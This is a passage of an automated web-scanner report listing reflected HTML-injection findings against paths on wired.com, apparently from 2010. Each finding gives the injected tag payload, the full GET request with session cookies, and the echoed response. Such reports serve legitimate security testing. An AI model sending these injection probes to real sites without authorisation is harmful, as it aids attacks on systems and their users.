Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:03 GMT
Date: Sun, 21 Nov 2010 23:09:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics209da"><a>9d347d00209 ss_law">
...[SNIP]...

1.614. http://www.wired.com/politics/law [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/law

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c1"><a>05b6fbcb3c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/lawd82c1"><a>05b6fbcb3c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:31 GMT
Date: Sun, 21 Nov 2010 23:09:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_lawd82c1"><a>05b6fbcb3c6">
...[SNIP]...

1.615. http://www.wired.com/politics/onlinerights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/onlinerights

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f2"><a>92180a2ca9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics623f2"><a>92180a2ca9b/onlinerights HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:05 GMT
Date: Sun, 21 Nov 2010 23:09:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics623f2"><a>92180a2ca9b ss_onlinerights">
...[SNIP]...

1.616. http://www.wired.com/politics/onlinerights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/onlinerights

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ecce"><a>b1a59a8a533 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/onlinerights3ecce"><a>b1a59a8a533 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:32 GMT
Date: Sun, 21 Nov 2010 23:09:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_onlinerights3ecce"><a>b1a59a8a533">
...[SNIP]...

1.617. http://www.wired.com/politics/security [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5482e"><a>d19474f130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics5482e"><a>d19474f130/security HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29318
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Sun, 21 Nov 2010 23:12:58 GMT
Date: Sun, 21 Nov 2010 23:09:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics5482e"><a>d19474f130 ss_security">
...[SNIP]...

1.618. http://www.wired.com/politics/security [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2a3"><a>f519379c247 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/security5f2a3"><a>f519379c247 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=555
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_security5f2a3"><a>f519379c247">
...[SNIP]...

1.619. http://www.wired.com/science [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da50c"><a>af7f20fae3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceda50c"><a>af7f20fae3a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29259
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:42 GMT
Date: Mon, 22 Nov 2010 01:11:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceda50c"><a>af7f20fae3a">
...[SNIP]...

1.620. http://www.wired.com/science/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb46"><a>7e95b9b5c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science8fb46"><a>7e95b9b5c37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29260
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:03:06 GMT
Date: Sun, 21 Nov 2010 19:59:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science8fb46"><a>7e95b9b5c37">
...[SNIP]...

1.621. http://www.wired.com/science/discoveries [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ddf"><a>cdde2cce323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science96ddf"><a>cdde2cce323/discoveries HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:10 GMT
Date: Sun, 21 Nov 2010 23:09:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science96ddf"><a>cdde2cce323 ss_discoveries">
...[SNIP]...

1.622. http://www.wired.com/science/discoveries [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38394"><a>ab4904fcd7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries38394"><a>ab4904fcd7d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:35 GMT
Date: Sun, 21 Nov 2010 23:09:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries38394"><a>ab4904fcd7d">
...[SNIP]...

1.623. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd1d"><a>538a6317253 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecbd1d"><a>538a6317253/discoveries/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:55 GMT
Date: Sun, 21 Nov 2010 23:12:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecbd1d"><a>538a6317253 ss_discoveries c_news">
...[SNIP]...

1.624. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da6c"><a>360db666dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries3da6c"><a>360db666dd0/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:13 GMT
Date: Sun, 21 Nov 2010 23:13:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries3da6c"><a>360db666dd0 c_news">
...[SNIP]...

1.625. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a30c"><a>b820a999ffb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news3a30c"><a>b820a999ffb/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:25 GMT
Date: Sun, 21 Nov 2010 23:13:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news3a30c"><a>b820a999ffb">
...[SNIP]...

1.626. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2189"><a>e200d456324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb2189"><a>e200d456324/discoveries/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:58 GMT
Date: Sun, 21 Nov 2010 23:12:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb2189"><a>e200d456324 ss_discoveries c_news">
...[SNIP]...

1.627. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fddd"><a>532487198c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries3fddd"><a>532487198c1/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:18 GMT
Date: Sun, 21 Nov 2010 23:13:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries3fddd"><a>532487198c1 c_news">
...[SNIP]...

1.628. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0f"><a>521893294d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news6ba0f"><a>521893294d7/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:31 GMT
Date: Sun, 21 Nov 2010 23:13:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news6ba0f"><a>521893294d7">
...[SNIP]...

1.629. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e52a"><a>266a89d6056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science6e52a"><a>266a89d6056/discoveries/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
